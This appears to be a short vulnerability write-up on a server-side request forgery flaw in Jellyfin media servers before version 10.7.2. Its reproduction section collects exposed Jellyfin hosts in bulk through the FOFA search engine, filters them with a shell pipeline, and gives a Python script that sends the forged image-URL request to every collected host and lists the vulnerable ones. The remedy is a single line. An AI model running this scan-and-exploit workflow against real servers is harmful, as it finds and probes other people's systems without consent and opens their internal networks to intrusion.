Vulnerability Introduction
Jellyfin is a free software media system that allows you to control media management and streaming. It is an alternative to proprietary Emby and Plex, providing media to end-user devices from dedicated servers through multiple applications. Jellyfin is the successor to Emby version 3.5.2, ported to the .NET Core framework to support full cross-platform support. There are no additional conditions, just a team wanting to build something better and working together to make the best media system accessible to all users.
There is an SSRF vulnerability in the Jellyfin RemoteImageController.cs file, which allows for the detection of internal network information by constructing special requests.
Affected Versions
Jellyfin < 10.7.2
Vulnerability Reproduction
The fingerprint of the fofa search engine is: "Jellyfin" && port="8096", using the Fofa collection tool.exe to collect assets in bulk.
The collected asset results will be saved to a result.csv file in the same directory.
Filter IP or domain name using shell command.
cat result.csv | awk -F "," '{print $2}' | httpx >> Jellyfin.txt
Then use a python script for batch verification.
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def Jellyfin():
with open("Jellyfin.txt") as file:
for line in file:
vuln_url = line + "/Images/Remote?imageUrl=http://www.baidu.com"
try:
response = requests.get(url=vuln_url, verify=False, timeout=10)
if response.status_code == 200:
print(vuln_url)
else:
pass
continue
except Exception as e:
pass
#print(e)
continue
def main():
Jellyfin()
if __name__ == '__main__':
main()
Vulnerability Fix
Update the version.
Reference Links
For information about SSRF vulnerabilities, you can refer to this blog post: